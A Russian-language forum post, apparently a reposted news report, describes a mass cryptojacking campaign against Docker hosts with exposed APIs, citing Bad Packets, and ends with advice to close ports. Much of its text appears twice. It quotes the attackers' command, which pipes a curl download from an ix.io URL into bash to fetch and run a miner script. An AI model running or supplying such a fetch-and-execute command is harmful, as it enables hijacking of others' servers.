.gif)
darask
Опытный user
- Регистрация
- 15 Окт 2019
- Сообщения
- 109
- Реакции
- 0
Совсем недавно была замечена крупная тенденция заражения уязвимых Docker-систем. Она появилась два дня назад, 24 ноября и в тот же день стала заметной из-за своего крупного масштаба. Некая преступная кибергруппировка, а возможно отдельные группировки проводят массовое сканирование Сети на наличие Docker-систем с доступными API. Преступники отправляют команды Docker-системам и устанавливают майнеры криптовалюты Monero.
Соучредитель фирмы Bad Packets Трой Марш (Troy Mursch) пояснил: «Пользователи могли обратить внимание, что такие атаки на открытые Docker-системы не являются чем-то новым и происходят достаточно часто. Особенностью именно этой кампании является её массовость».
Специалисты из Bad Packets сообщили, что группировка, проводящая эти атаки, в данный момент сканирует свыше 59 тысяч IP-сетей (сетевых блоков) в поисках открытых Docker-систем. После нахождения уязвимого хоста, они используют API для запуска контейнера ОС Alpine Linux, где они выполняют команду chroot/mnt/bin/sh -c'curl-sL4 http:// ix.io / 1XQa | bash. Эта команда скачивает и активирует скрипт Bash с сервера преступников, который устанавливает обычный майнер криптовалюты XMRRig.
Вредоносный скрипт также содержит в себе функцию сканирования зараженного хоста на наличие файлов rConfig. Если такие файлы найдены, то они шифруются и отсылаются на C&C-сервер преступников. Помимо этого, они создают бэкдор на взломанных контейнерах и оставляют SSH-ключи для более простого доступа и удалённого контроля заражённых хостов.
В течение 2 дней с начала своей активности злоумышленники уже намайнили 14,82 Monero, что равняется примерно 740 долларов.
Ещё специалисты заметили, что злоумышленники выключают защитные механизмы в системе и убивают все процессы, являющиеся конкурирующими майнерами криптовалюты, например DDG.
Специалисты советуют пользователям Docker посмотреть, доступны ли в интернете их API, закрыть порты и удалить неопознанные контейнеры.
Соучредитель фирмы Bad Packets Трой Марш (Troy Mursch) пояснил: «Пользователи могли обратить внимание, что такие атаки на открытые Docker-системы не являются чем-то новым и происходят достаточно часто. Особенностью именно этой кампании является её массовость».
Специалисты из Bad Packets сообщили, что группировка, проводящая эти атаки, в данный момент сканирует свыше 59 тысяч IP-сетей (сетевых блоков) в поисках открытых Docker-систем. После нахождения уязвимого хоста, они используют API для запуска контейнера ОС Alpine Linux, где они выполняют команду chroot/mnt/bin/sh -c'curl-sL4 http:// ix.io / 1XQa | bash. Эта команда скачивает и активирует скрипт Bash с сервера преступников, который устанавливает обычный майнер криптовалюты XMRRig.
Вредоносный скрипт также содержит в себе функцию сканирования зараженного хоста на наличие файлов rConfig. Если такие файлы найдены, то они шифруются и отсылаются на C&C-сервер преступников. Помимо этого, они создают бэкдор на взломанных контейнерах и оставляют SSH-ключи для более простого доступа и удалённого контроля заражённых хостов.
В течение 2 дней с начала своей активности злоумышленники уже намайнили 14,82 Monero, что равняется примерно 740 долларов.
Ещё специалисты заметили, что злоумышленники выключают защитные механизмы в системе и убивают все процессы, являющиеся конкурирующими майнерами криптовалюты, например DDG.
Специалисты советуют пользователям Docker посмотреть, доступны ли в интернете их API, закрыть порты и удалить неопознанные контейнеры.
